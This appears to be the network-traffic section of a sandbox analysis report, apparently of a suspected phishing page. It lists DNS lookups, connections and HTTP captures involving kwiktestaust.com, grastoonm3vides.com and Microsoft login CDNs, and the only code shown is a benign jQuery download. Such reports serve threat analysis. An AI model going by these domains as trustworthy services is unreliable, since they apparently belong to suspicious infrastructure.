                                                                Nov 7, 2024 21:42:03.002314091 CET4434982435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:03.015326977 CET4434982535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:03.050331116 CET49824443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:03.092408895 CET4434982435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:03.092737913 CET49824443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:03.092765093 CET4434982435.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:03.092823982 CET49824443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:03.117316008 CET4434982535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:03.117604017 CET49825443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:03.117649078 CET4434982535.190.80.1192.168.2.16
                                                                Nov 7, 2024 21:42:03.117713928 CET49825443192.168.2.1635.190.80.1
                                                                Nov 7, 2024 21:42:03.680336952 CET44349826142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:42:03.680608988 CET49826443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:42:03.680624008 CET44349826142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:42:03.680969954 CET44349826142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:42:03.681273937 CET49826443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:42:03.681340933 CET44349826142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:42:03.721272945 CET49826443192.168.2.16142.250.186.100
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 7, 2024 21:39:57.865914106 CET53645211.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:39:57.880057096 CET53562291.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:39:58.003161907 CET6468353192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:39:58.003417969 CET6416853192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:39:58.010615110 CET53646831.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:39:58.010626078 CET53641681.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:39:59.150634050 CET53603081.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:39:59.407116890 CET5074153192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:39:59.407284021 CET5554453192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:39:59.413975000 CET53555441.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:39:59.414839983 CET53507411.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:39:59.424707890 CET5827653192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:39:59.424907923 CET6537453192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:39:59.437349081 CET53653741.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:39:59.439477921 CET53582761.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:02.709379911 CET6262553192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:02.709517956 CET5936753192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:02.716244936 CET53593671.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:02.716500044 CET53626251.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:03.596235037 CET5308553192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:03.596690893 CET6369153192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:03.604406118 CET53636911.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:03.607873917 CET53530851.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:05.062354088 CET5460453192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:05.062721014 CET5928053192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:05.069794893 CET53546041.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:05.070066929 CET53592801.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:05.168510914 CET6173953192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:05.168701887 CET5950053192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:05.173836946 CET5617753192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:05.173968077 CET5242453192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:05.174236059 CET5868253192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:05.174360991 CET6060553192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:05.177495003 CET53595001.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:05.181338072 CET53524241.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:05.181350946 CET53586821.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:05.181381941 CET53606051.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:05.192246914 CET53561771.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:05.209564924 CET5791853192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:05.209695101 CET4916653192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:05.216692924 CET53579181.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:05.217369080 CET53491661.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:05.299550056 CET53591331.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:05.334583044 CET53617391.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:06.507800102 CET5878053192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:06.508054972 CET5009453192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:06.515706062 CET53587801.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:06.515907049 CET53500941.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:09.914663076 CET6344253192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:09.914810896 CET5823753192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:09.928018093 CET53582371.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:09.929693937 CET53634421.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:16.120829105 CET53579291.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:35.051330090 CET53527221.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:54.812222958 CET5613853192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:54.812347889 CET5880653192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:40:54.833410025 CET53561381.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:54.850677013 CET53588061.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:57.498764992 CET53595251.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:40:57.849910975 CET53507671.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:41:01.572000980 CET6077753192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:41:01.572132111 CET5304253192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:41:01.578907013 CET53530421.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:41:01.579272032 CET53607771.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:41:02.057801008 CET138138192.168.2.16192.168.2.255
                                                                Nov 7, 2024 21:41:26.028770924 CET53654861.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:42:01.581558943 CET5851353192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:42:01.581799030 CET5357353192.168.2.161.1.1.1
                                                                Nov 7, 2024 21:42:01.588404894 CET53535731.1.1.1192.168.2.16
                                                                Nov 7, 2024 21:42:01.588712931 CET53585131.1.1.1192.168.2.16
                                                                TimestampSource IPDest IPChecksumCodeType
                                                                Nov 7, 2024 21:40:06.196192026 CET192.168.2.161.1.1.1c2ea(Port unreachable)Destination Unreachable
                                                                Nov 7, 2024 21:40:54.850778103 CET192.168.2.161.1.1.1c289(Port unreachable)Destination Unreachable
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Nov 7, 2024 21:39:58.003161907 CET192.168.2.161.1.1.10x2174Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:39:58.003417969 CET192.168.2.161.1.1.10x1463Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Nov 7, 2024 21:39:59.407116890 CET192.168.2.161.1.1.10x3ed3Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:39:59.407284021 CET192.168.2.161.1.1.10x1076Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Nov 7, 2024 21:39:59.424707890 CET192.168.2.161.1.1.10x6353Standard query (0)kwiktestaust.comA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:39:59.424907923 CET192.168.2.161.1.1.10x9c95Standard query (0)kwiktestaust.com65IN (0x0001)false
                                                                Nov 7, 2024 21:40:02.709379911 CET192.168.2.161.1.1.10x2ad1Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:02.709517956 CET192.168.2.161.1.1.10x14dcStandard query (0)www.google.com65IN (0x0001)false
                                                                Nov 7, 2024 21:40:03.596235037 CET192.168.2.161.1.1.10x1e7fStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:03.596690893 CET192.168.2.161.1.1.10xfe28Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.062354088 CET192.168.2.161.1.1.10xb7e2Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.062721014 CET192.168.2.161.1.1.10xfee8Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.168510914 CET192.168.2.161.1.1.10x539aStandard query (0)kwiktestaust.comA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.168701887 CET192.168.2.161.1.1.10xc93cStandard query (0)kwiktestaust.com65IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.173836946 CET192.168.2.161.1.1.10x1a82Standard query (0)www.w3schools.comA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.173968077 CET192.168.2.161.1.1.10x8857Standard query (0)www.w3schools.com65IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.174236059 CET192.168.2.161.1.1.10xc88eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.174360991 CET192.168.2.161.1.1.10x71a3Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.209564924 CET192.168.2.161.1.1.10x9339Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.209695101 CET192.168.2.161.1.1.10x233bStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                Nov 7, 2024 21:40:06.507800102 CET192.168.2.161.1.1.10xae4fStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:06.508054972 CET192.168.2.161.1.1.10x538Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                Nov 7, 2024 21:40:09.914663076 CET192.168.2.161.1.1.10x252eStandard query (0)grastoonm3vides.comA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:09.914810896 CET192.168.2.161.1.1.10x8578Standard query (0)grastoonm3vides.com65IN (0x0001)false
                                                                Nov 7, 2024 21:40:54.812222958 CET192.168.2.161.1.1.10xa0baStandard query (0)grastoonm3vides.comA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:54.812347889 CET192.168.2.161.1.1.10x5499Standard query (0)grastoonm3vides.com65IN (0x0001)false
                                                                Nov 7, 2024 21:41:01.572000980 CET192.168.2.161.1.1.10xf441Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:41:01.572132111 CET192.168.2.161.1.1.10xba16Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                Nov 7, 2024 21:42:01.581558943 CET192.168.2.161.1.1.10x86e7Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:42:01.581799030 CET192.168.2.161.1.1.10x818eStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Nov 7, 2024 21:39:58.010615110 CET1.1.1.1192.168.2.160x2174No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:39:58.010615110 CET1.1.1.1192.168.2.160x2174No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:39:58.010626078 CET1.1.1.1192.168.2.160x1463No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Nov 7, 2024 21:39:59.413975000 CET1.1.1.1192.168.2.160x1076No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Nov 7, 2024 21:39:59.414839983 CET1.1.1.1192.168.2.160x3ed3No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:39:59.414839983 CET1.1.1.1192.168.2.160x3ed3No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:39:59.437349081 CET1.1.1.1192.168.2.160x9c95No error (0)kwiktestaust.com65IN (0x0001)false
                                                                Nov 7, 2024 21:39:59.439477921 CET1.1.1.1192.168.2.160x6353No error (0)kwiktestaust.com188.114.97.3A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:39:59.439477921 CET1.1.1.1192.168.2.160x6353No error (0)kwiktestaust.com188.114.96.3A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:02.716244936 CET1.1.1.1192.168.2.160x14dcNo error (0)www.google.com65IN (0x0001)false
                                                                Nov 7, 2024 21:40:02.716500044 CET1.1.1.1192.168.2.160x2ad1No error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:03.604406118 CET1.1.1.1192.168.2.160xfe28No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:03.607873917 CET1.1.1.1192.168.2.160x1e7fNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:03.607873917 CET1.1.1.1192.168.2.160x1e7fNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:03.607873917 CET1.1.1.1192.168.2.160x1e7fNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:03.607873917 CET1.1.1.1192.168.2.160x1e7fNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:03.607873917 CET1.1.1.1192.168.2.160x1e7fNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.069794893 CET1.1.1.1192.168.2.160xb7e2No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.069794893 CET1.1.1.1192.168.2.160xb7e2No error (0)d2vgu95hoyrpkh.cloudfront.net13.227.219.40A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.069794893 CET1.1.1.1192.168.2.160xb7e2No error (0)d2vgu95hoyrpkh.cloudfront.net13.227.219.11A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.069794893 CET1.1.1.1192.168.2.160xb7e2No error (0)d2vgu95hoyrpkh.cloudfront.net13.227.219.97A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.069794893 CET1.1.1.1192.168.2.160xb7e2No error (0)d2vgu95hoyrpkh.cloudfront.net13.227.219.47A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.070066929 CET1.1.1.1192.168.2.160xfee8No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.177495003 CET1.1.1.1192.168.2.160xc93cNo error (0)kwiktestaust.com65IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.181338072 CET1.1.1.1192.168.2.160x8857No error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.181350946 CET1.1.1.1192.168.2.160xc88eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.181350946 CET1.1.1.1192.168.2.160xc88eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.181381941 CET1.1.1.1192.168.2.160x71a3No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.192246914 CET1.1.1.1192.168.2.160x1a82No error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.192246914 CET1.1.1.1192.168.2.160x1a82No error (0)cs837.wac.edgecastcdn.net192.229.133.221A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.214715004 CET1.1.1.1192.168.2.160xc9ebNo error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.214715004 CET1.1.1.1192.168.2.160xc9ebNo error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.216692924 CET1.1.1.1192.168.2.160x9339No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.216692924 CET1.1.1.1192.168.2.160x9339No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.216692924 CET1.1.1.1192.168.2.160x9339No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.217041969 CET1.1.1.1192.168.2.160x9fdNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.217041969 CET1.1.1.1192.168.2.160x9fdNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.217369080 CET1.1.1.1192.168.2.160x233bNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.217369080 CET1.1.1.1192.168.2.160x233bNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.334583044 CET1.1.1.1192.168.2.160x539aNo error (0)kwiktestaust.com188.114.97.3A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:05.334583044 CET1.1.1.1192.168.2.160x539aNo error (0)kwiktestaust.com188.114.96.3A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:06.120153904 CET1.1.1.1192.168.2.160xb9c4No error (0)shed.dual-low.s-part-0036.t-0009.t-msedge.nets-part-0036.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:06.120153904 CET1.1.1.1192.168.2.160xb9c4No error (0)s-part-0036.t-0009.t-msedge.net13.107.246.64A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:06.168421030 CET1.1.1.1192.168.2.160x62a4No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:06.168421030 CET1.1.1.1192.168.2.160x62a4No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:06.515706062 CET1.1.1.1192.168.2.160xae4fNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:06.515706062 CET1.1.1.1192.168.2.160xae4fNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:06.515706062 CET1.1.1.1192.168.2.160xae4fNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:06.515907049 CET1.1.1.1192.168.2.160x538No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:06.515907049 CET1.1.1.1192.168.2.160x538No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Nov 7, 2024 21:40:09.928018093 CET1.1.1.1192.168.2.160x8578No error (0)grastoonm3vides.com65IN (0x0001)false
                                                                Nov 7, 2024 21:40:09.929693937 CET1.1.1.1192.168.2.160x252eNo error (0)grastoonm3vides.com188.114.97.3A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:09.929693937 CET1.1.1.1192.168.2.160x252eNo error (0)grastoonm3vides.com188.114.96.3A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:54.833410025 CET1.1.1.1192.168.2.160xa0baNo error (0)grastoonm3vides.com188.114.96.3A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:54.833410025 CET1.1.1.1192.168.2.160xa0baNo error (0)grastoonm3vides.com188.114.97.3A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:40:54.850677013 CET1.1.1.1192.168.2.160x5499No error (0)grastoonm3vides.com65IN (0x0001)false
                                                                Nov 7, 2024 21:41:01.579272032 CET1.1.1.1192.168.2.160xf441No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                Nov 7, 2024 21:42:01.588712931 CET1.1.1.1192.168.2.160x86e7No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                • cdnjs.cloudflare.com
                                                                • kwiktestaust.com
                                                                • https:
                                                                  • cdn.socket.io
                                                                  • logincdn.msauth.net
                                                                  • aadcdn.msauth.net
                                                                  • www.w3schools.com
                                                                  • aadcdn.msftauth.net
                                                                  • grastoonm3vides.com
                                                                • fs.microsoft.com
                                                                • slscr.update.microsoft.com
                                                                • a.nel.cloudflare.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.1649706104.17.25.144436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:39:58 UTC520OUTGET /ajax/libs/jquery/3.5.1/jquery.min.js HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:39:58 UTC958INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:39:58 GMT
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=30672000
                                                                ETag: W/"5eb09ed3-15d84"
                                                                Last-Modified: Mon, 04 May 2020 23:01:39 GMT
                                                                cf-cdnjs-via: cfworker/kv
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Timing-Allow-Origin: *
                                                                X-Content-Type-Options: nosniff
                                                                CF-Cache-Status: HIT
                                                                Age: 23816
                                                                Expires: Tue, 28 Oct 2025 20:39:58 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f18gybbFRFCRzGQUFXSTmMhpc27z830clI2S1o%2FHfrOZBvs2oXMXYKkqioMXNIAmENRrrvT%2BAwYVA%2Bpqvcni6B9E2oKVHtZakjHlgxXYrHwWzjeMp1hu81ZZc7oxJmfjoxf6Oz63"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                Strict-Transport-Security: max-age=15780000
                                                                Server: cloudflare
                                                                CF-RAY: 8df022c00b486b14-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-11-07 20:39:58 UTC411INData Raw: 37 62 66 32 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a
                                                                Data Ascii: 7bf2/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("j
                                                                2024-11-07 20:39:58 UTC1369INData Raw: 65 4f 66 2c 73 3d 74 2e 73 6c 69 63 65 2c 67 3d 74 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 76 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 76 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 79 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 65 2e 6e 6f
                                                                Data Ascii: eOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.no
